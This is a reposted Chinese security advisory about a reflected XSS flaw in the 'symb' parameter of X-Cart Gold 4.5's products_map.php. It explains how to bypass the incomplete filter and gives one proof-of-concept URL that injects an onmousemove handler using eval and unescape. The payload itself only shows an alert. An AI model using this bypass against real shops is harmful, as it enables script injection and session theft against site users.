X-Cart Gold 4.5 (products_map.php symb parameter) XSS缺陷 --自学php网

X-Cart Gold 4.5 (products_map.php symb parameter) XSS缺陷 -

来源：自学PHP网时间：2015-04-17 14:11 作者：阅读:次

[导读] 标题: X-Cart Gold 4.5 (products_map.php symb parameter) XSS Vulnerability作者muts影响版本: X-Cart Gold 4.5开发者地址: http://www.x-cart.com/概要：X-Cart Gold implements a degree o......

标题: X-Cart Gold 4.5 (products_map.php symb parameter) XSS Vulnerability
作者 muts
影响版本: X-Cart Gold 4.5
开发者地址: http://www.x-cart.com/
概要：
X-Cart Gold implements a degree of XSS filtering but it is incomplete.
The "symb" parameter of "products_map.php" is vulnerable to XSS and can be bypassed by using
HTML anchor methods and URL encoding.

测试方法
http://www.2cto.com /xcart/products_map?symb=%22%20onmousemove=javascript:eval%28unescape%28%26quot%3balert%28%22xss%22%29%3B%26quot%3B%29%29%3EAAAAAA

my.2345.comsql注入泄漏用户信息 - 网站安全 - 自学

PHP-Nuke模块(SPChat) SQL注射及修复 - 网站安全 - 自学

子栏目

X-Cart Gold 4.5 (products_map.php symb parameter) XSS缺陷 -

最新评论

添加评论

更多文章推荐

添加评论